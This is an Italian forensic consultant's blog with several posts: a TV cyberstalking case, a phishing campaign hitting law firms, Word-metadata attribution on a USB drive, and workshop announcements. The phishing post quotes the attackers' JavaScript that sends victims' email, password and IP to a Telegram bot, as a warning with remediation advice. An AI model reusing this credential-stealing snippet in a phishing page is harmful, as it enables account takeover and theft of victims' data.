Dopo l’hacker dell’autoscuola sono tornato a collaborare con Le Iene, come perito informatico forense, nel caso di Noemi, una ragazza di Monreale in provincia di Palermo, che da 7 mesi sta raccogliendo prove digitali degli episodi di stalking di cui sarebbe vittima ricevendo quotidianamente messaggi con minacce da parte d’ignoti.
Il servizio de Le Iene, condotto da Veronica Ruggeri, andato in onda in due puntate, la prima il 18 novembre 2025 e la seconda il 26 novembre 2025 si apre con uno scenario nel quale Noemi narra gli eventi di cyberstalking che avrebbe subito nel corso degli ultimi sette mesi, fatti di messaggi SMS o Instagram, chiamate anonime, email con allegati, movimenti sotto casa, luci sospette e persino potenziali telecamere che spiano la vita sua e della madre.
Gli SMS paiono arrivare dallo stesso numero di telefono della ragazza, si possono quindi fare due ipotesi: spoofing (cioè invio di messaggi utilizzando come mittente il numero di qualcun altro) oppure provenienza degli SMS dallo stesso smartphone che li riceve.
I profili Instagram anonimi paiono essere stati creati e poi cancellati subito dopo le comunicazioni, quindi solo la Polizia Giudiziaria è in grado di ottenere informazioni, dall’esterno anche tramite tecniche OSINT non è possibile ricavare dati che possano essere utili a svelarne l’identità.
Durante la seconda puntata, nella quale ho contribuito come tecnico informatico forense per Le Iene al fine di far luce sul mistero dello stalker, abbiamo proceduto all’esecuzione di copie forensi tramite software Oxygen Forensics, con varie modalità – inclusa la Full File System FFS tramite Checkm8 – al fine di poter successivamente analizzare i dati acquisiti in maniera forense.
Prima di eseguire le copie forensi, insieme al collega Matteo Vinci – parte della società Forenser – abbiamo provveduto a generare il sysdiagnose degli iPhone e iPad, così da avere traccia dei crash log o bug report, utili per procedere con attività di spyhunting e rilevamento malware e spy software, per verificare l’eventualità che il telefono fosse controllato da remoto.
Un articolo che non parla d’informatica forense, come di consueto, ma è da leggere con attenzione e far girare in particolare tra gli avvocati: è importante saper riconoscere il phishing che sta colpendo gli studi legali italiani (e non solo) che porta a potenziali databreach a catena, dato che chi subisce l’attacco poi diventa vettore – verso i suoi contatti – di nuovi attacchi.
In questi giorni arrivano infatti agli avvocati email da parte di colleghi (ma anche clienti o collaboratori) che citano un documento di “Pagamento fattura” non allegato ma condiviso tramite OneNote, come mostrato nelle immagini allegate al post.
La mail ha come oggetto una frase tipo: “Studio Legale Associato XYZ ha condiviso la file Elementi condivisi il giorno 06-11-2025′ con te”.
Cliccando sul link si apre una pagina che indica che il documento contenente la fattura è crittografato ed è necessario loggarsi su Microsoft OneNote per accedervi:
"Avv. ABC - STUDIO LEGALE ASSOCIATO XYZ ho condiviso un nuovo documento con te
Pagamenti delle fattura.pdf(601 KB)
Cliccando sul link “Visualizzare il documento condiviso” si giunge a una pagina con diversi login.
E’ possibile inserire il proprio login con username e password per ogni tipo di account di posta elettronica che si possiede, partendo dai principali come Office365, Outlook, Rackspace, Aruba, PEC o anche altri account:
Accedi alla tua e-mail per visualizzare il documento condiviso.
Accedi qui sotto.
Accedi con Office365
Accedi con Outlook
Accedi con Rackspace
Accedi con Aruba Mail
Accedi con PEC
Accedi con Altra Posta
Inserendo le proprie credenziali ai vari link, queste vengono inviate agli attaccanti tramite una chiamata API a un bot Telegram:
forma.addEventListener("submit", e =>{ e.preventDefault(); let email = document.querySelector('#e-mail').value let pwd = document.querySelector('#pwd').value let ips = document.querySelector('#ipaddress').value fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=Email:${email}=Password:=${pwd}=IP:=${ips}`, { method: "GET" }).then(success => { window.location.replace("https://www.onenote.com/"); }, error => { alert("Message not sent") console.log(error) })
In sostanza, gli attaccanti, per scaricare il file chiedono d’inserire su un finto sito Microsoft username e password di posta (Office365, Outlook, Rackspace, Aruba S.p.A., PEC o anche qualunque altra) ma ovviamente una volta loggati invece di mostrare la fattura:
1) gli attaccanti entrano nell’account di posta dello Studio;
2) se hanno tempo e voglia scaricano i messaggi e gli allegati;
3) scaricano la rubrica e inviano a tutti i contatti la stessa mail ricevuta sperando che anche loro si facciano trarre in inganno..
Le email che arrivano sono originali e autentiche, inviate dal vero account del collega avvocato, non sono spoofing e tendono a passare i controlli antispam, quindi l’unica prevenzione è non inserire la password al link con il documento condiviso. Se cliccate su link e andate avanti senza inserire credenziali non succede nulla.
Se avete già inserito user/password, gli attaccanti stanno potenzialmente scaricandosi i vostri messaggi, la rubrica e inviando ai vostri contatti lo stesso messaggio: cambiate subito password, loggatevi sulla webmail per chiudere eventuali altre sessioni aperte, attivate 2FA se già non lo avete, valutate se informare i contatti di non aprire link da voi ricevuti, se volete capire cosa hanno fatto gli attaccanti nel vostro account scaricate/chiedete i file di log del provider.
Se avete ricevuto mail simili a quelle allegate al post quindi cancellatele anche se provengono da colleghi oppure se avete voglia inviatemi il file EML che ne sto collezionando diversi per analizzare come il phishing sta diffondendosi tra i professionisti e quali tecniche utilizzano gli attaccanti per rendere credibile il phishing.
Martedì 4 novembre 2025 è andato in onda il servizio de Le Iene dove, come perito forense, ho aiutato la Iena Filippo Roma a trovare riferimenti a potenziali autori all’interno di una pendrive USB contenente un documento Word.
Il servizio de Le Iene parla di una questione nella quale non mi addentro, poiché mi è stato semplicemente chiesto se fosse possibile trovare l’autore, il proprietario o l’utilizzatore di una pendrive USB, in particolare basandomi su di un documento Microsoft Office Word in essa contenuto.
L’attività di perizia informatica è iniziata con la realizzazione di una copia forense della pendrive USB – così da cristallizzarne e preservarne il contenuto all’interno di una immagine forense con estensione EWF, in modo da poterla successivamente analizzare.
L’analisi forense svolta come perito informatico per Le Iene – in particolare per Filippo Roma e l’autore del servizio TV – è stata eseguita tramite il software X-Ways Forensics, con il quale ho eseguito carving, recupero dati e ricostruzione del filesystem, inclusi file cancellati e relativi metadati EXIF di immagini, OOXML di file Word e XMP di file PDF.
Il software XWF – X-Ways Forensics – permette a chi opera come consulente informatico forense di eseguire attività di analisi e perizia informatica su immagini forensi al fine di ricostruire file eliminati e categorizzare metadati ed evidenze digitali
Come contro-verifica – in ambito informatica forense è sempre importante l’attività di cross examination – ho utilizzato anche il noto software open source Exiftool, così da poter confermare le risultanze ottenute mediante il tool forense XWF e produrre quindi una valutazione circa l’attribuzione del file.
Nella pendrive erano presenti ulteriori file di tipo “.Trashes”, “.TemporaryItems”, “.Spotlight-V100” con i subfolder “Store-V2” e all’interno i vari journal e index, ma in nessuno di tali artefatti erano contenute indicazioni circa l’attribuzione della pendrive o meglio, si sono trovati gli stessi riscontri presenti nel file Word oggetto di analisi.
Dal punto di vista informatico forense, la presenza di uno specifico nominativo nel campo “Creator/Author” o “Last Modified By/Last Saved By” non indica necessariamente l’autore del documento o dell’ultima modifica ma il nominativo con cui è stato configurato il software utilizzato per generare il documento Word.
In genere, quindi, quando si rileva un nominativo nel campo autore del documento o dell’ultima modifica al documento in un file Word – ma anche Excel o Powerpoint, oltre a PDF o eventuali file JPG, multimediali, etc… – possono verificarsi tre situazioni:
Il nominativo presente nei dati EXIF/XMP/OOXML può effettivamente essere l’autore del documento;
Lo user indicato nei metadati del file Word può essere quello con cui è stato configurato il sistema utilizzato per creare o modificare il file ma il file non è stato creato/modificato da tale soggetto;
Lo username reperibile nei meta dati può essere stato inserito apposta nel file da terzi per forzare l’attribuzione di un file a un soggetto (es. per attribuirgli la creazione/modifica del file).
Ovviamente dall’analisi forense di un solo file non è possibile distinguere con una perizia informatica in quale casistica di quelle riportate sopra rientri, se non esaminando ulteriori elementi (es. altri file presenti sul dispositivo, percorsi/path del filesystem lasciati nei file, negli indici o nei dati temporanei, etc…) e quindi non si possono fare ulteriori valutazioni.
Proprio per questo motivo è importante procedere con la massima cautela quando si ricavano informazioni dai metadati dei file, valutando le possibili interpretazioni in base a ulteriori elementi, anche investigativi, che possano confermare o meno l’attendibilità dell’attribuzione.
Come si acquisisce in maniera forense una pagina web? Come si cristallizza un post Instagram o un commento ricevuto su Facebook per fini giudiziari? Se stampo una mail in PDF ha valore legale come prova digitale in Tribunale?
Queste e altre domande troveranno risposta nel talk sulla Web Forensics che terrò insieme al collega Andrea Lazzarotto giovedì 6 novembre 2025 a Roma nell’ambito del workshop organizzato da MSAB intotolato “Nuovi Orizzonti per le Indagini Digitali Forensi: Sfide e Soluzioni”.
L’evento, organizzato in collaboration con Nuix, SANS Institute and eTrace Digital Security, si terrà in presenza presso l’UNA HOTELS Hotel Empire dalle 8:30 alle 18:30 e prevede talk di altissimo livello su argomenti d’informatica forense e mobile forensics con l’intervento dei seguenti professionisti:
Mattia Epifani, CEO di Reality Net, consulente informatico forense, esperto in attività di Digital Mobile Forensics, docente certificato SANS, docente universitario, autore e divulgatore, con l’intervento: “Not So Private Browsing!”
Paolo Dal Checco, Consulente informatico forense, esperto in attività di Digital Mobile Forensics, analisi di OSINT, malware e criptovalute, docente universitario, autore e divulgatore, insieme a
Andrea Lazzarotto, Consulente informatico forense, esperto in attività di Digital Mobile Forensics, ricercatore, sviluppatore, con l’intervento: “Web Forensics: Le Nuove frontiere delle Prove Digitali”
Roberto Murenec, Maresciallo in forza al Comando Provinciale della Guardia di Finanza di Pordenone, autore, divulgatore e esperto di Digital Forensics e relativa regolamentazione legislativa, insieme a
Pier-Luca Toselli, Luogotenente Carica Speciale in forza al Comando Provinciale della Guardia di Finanza di Bologna, esperto di Digital Forensics e relativa regolamentazione legislativa, con l’intervento: “Perquisizione e Sequestro del Dispositivo “Mobile” Tra Rispetto delle Regole Processuali e delle Garanzie di Parte”
I responsabili di E-Trace, rivenditore esclusivo MSAB per il territorio italiano.
Manlio Longinotti, Responsabile Italia SANS, con l’intervento: “SANS DFIR Trainings: La Formazione Oltre l’Aggiornamento”
Dario Beniamini, GCFA, GCFE, GOSI, CFIP, CIFI, Esperto in proprietà intellettuale e tutela dei marchi, DFIR, NUIX Senior Consultant, docente certificato SANS, con l’intervento: “Rethinking Digital Investigations: Beyond Keyword Searches”
Ghennadii KONEV, con l’intervento: “Non Solo FFS, Estrazioni Fisiche BFU con XRY”
Giovanni Maria Castoldi, MSAB North Mediterranean Area Sales Manager.
Workshop sulla Web Forensics e le Indagini Digitali
Nel mio intervento, insieme ad Andrea Lazzarotto, parleremo di un tema sempre più centrale nelle indagini digitali: la Web Forensics, ovvero l’insieme di tecniche e metodologie per acquisire, preservare e analizzare prove provenienti dal web come siti web, pagine web, servizi online, piattaforme cloud, API, social network e applicazioni mobili.
Spesso le indagini digitali si concentrano su dispositivi fisici, ma oggi una parte sempre più significativa delle evidenze si trova “fuori” dal computer, nel cloud o su piattaforme web in continua evoluzione. Da qui nasce la necessità della webforensics, cioè quella di rendere l’acquisizione forense di risorse web affidabile, ripetibile e non disconoscibile, al pari di quella tradizionale.
Durante il talk sulla Web-Forensics mostreremo come costruire una macchina virtuale forense per l’acquisizione di pagine e contenuti web, documentando ogni passaggio (traffico di rete, video, log, certificati, riferimenti temporali, ecc.), come cristallizzare l’ambiente e i risultati con tecniche di hashing, timestamping e marca temporale e come utilizzare strumenti open source specifici per l’acquisizione e la verifica, come FIT (Freezing Internet Tool) e Fuji, sviluppati per garantire integrità, catena di custodia e trasparenza nelle operazioni di copia e analisi.
Parleremo anche di acquisizioni di contenuti “complessi”, come flussi video o chiamate API, oltre che di come intercettare e documentare correttamente il traffico HTTPS o REST attraverso strumenti utilizzabili in ambito web forensics come mitmproxy.
Le slide dell’intervento sulla Web Forensics sono visionabili e scaricabili gratuitamente in download dalla sezione qui di seguito.
Infine, a latere – poiché non si tratta di webforensics pura – discuteremo delle nuove sfide legate all’acquisizione forense dei dispositivi Mac con chip Apple Silicon, che richiedono un cambio di paradigma simile a quello già affrontato nel mondo mobile.
L’obiettivo del workshop sulla Web Forensics è mostrare un metodo pratico e ripetibile per affrontare in modo rigoroso e documentato la cristallizzazione di prove digitali web, in linea con i principi della Legge 48/2008, della ISO/IEC 27037 e delle best practice internazionali.
Agenda dell’evento MSAB a Roma
L’evento che si terrà giovedì 6 novembre 2025 a Roma nell’ambito del workshop organizzato da MSAB intotolato “Nuovi Orizzonti per le Indagini Digitali Forensi: Sfide e Soluzioni” seguirà la seguente agenda dei lavori:
8:45 Registrazione Partecipanti
9:30 Introduzione
9:45 Ghennadii Konev & Giovanni Maria Castoldi con l’intervento: “Non Solo FFS, Estrazioni Fisiche BFU con XRY”
10:30 Coffee Break
10:45 Mattia Epifani con l’intervento: “„”Not So Private Browsing!“
11:45 Dario Beniamini con l’intervento: “Rethinking Digital Investigations: Beyond Keyword Searches”
12:30 Paolo Dal Checco & Andrea Lazzarotto con l’intervento: “Web Forensics: Le Nuove frontiere delle Prove Digitali”
13:15 Pranzo
14:30 Manlio Longinotti con l’intervento: “SANS DFIR Trainings: La Formazione Oltre l’Aggiornamento”
15:00 Pier Luca Toselli & Roberto Murenec con l’intervento: “Perquisizione e Sequestro del Dispositivo Mobile“ Tra Rispetto delle Regole Processuali e delle Garanzie di Parte“
Mercoledì 5 novembre dalle 10:00 alle 13:00 si terrà a Milano presso la Sala Conferenze “Eligio Gualdoni” nel Palazzo di Giustizia Milano il seminario “La prova nelle indagini preliminari, prove informatiche e sfide dell’intelligenza artificiale”, evento gratuito, organizzato dall’Ordine degli Avvocati di Milano – Commissione Codice Rosso – attraverso la Fondazione Forense, nell’ambito del programma di formazione continua per gli Avvocati.
I saluti introduttivi dell’evento sulla prova digitale nelle indagini preliminari che si terrà a Milano in Tribunale saranno dell’Avv. Antonio Finelli, Consigliere dell’Ordine degli Avvocati di Milano, Coordinatore della Commissione Codice Rosso.
I temi trattati e i relatori della giornata su “La prova nelle indagini preliminari, prove informatiche e sfide dell’intelligenza artificiale” saranno i seguenti:
L’acquisizione e conservazione della prova informatica: breve lettura del quadro normativo italiano e della giurisprudenza di legittimità – Avv. Maria Teresa Zampogna, Componente della Commissione Codice Rosso dell’Ordine degli Avvocati di Milano;
L’efficacia probatoria dei documenti informatici e la valutazione giudiziale delle prove digitali – Avv. Anna Campanella, Componente della Commissione Codice Rosso dell’Ordine degli Avvocati di Milano;
L’impatto dell’intelligenza artificiale generativa nella raccolta della prova informatica: dall’analisi delle tecnologie di manipolazione e di rilevamento alle strategie difensive e probatorie – Dott. Paolo Dal Checco, Consulente Informatico Forense;
Deepfake, manipolazione digitale e nuove sfide probatorie: prassi e azioni del Tribunale nella valutazione della prova informatica nell’epoca dell’intelligenza artificiale generativa – Dott. Roberto Crepaldi, Giudice per le Indagini Preliminari presso il Tribunale di Milano;
L’art. 50 del codice deontologico forense: fra dovere di verità e la raccolta e l’utilizzo di prove (false) – Avv. Antonio Finelli, Consigliere dell’Ordine degli Avvocati di Milano, Coordinatore della Commissione Codice Rosso;
Il ruolo dell’investigatore privato nella genesi dell’evidenza digitale – Fabio Di Venosa, Investigatore privato.
La partecipazione all’evento consente l’attribuzione di n. 3 crediti formativi di cui n. 1 in materia obbligatoria.
La locandina dell’evento “La prova nelle indagini preliminari, prove informatiche e sfide dell’intelligenza artificiale” è disponibile qui di seguito per la visione o il download.
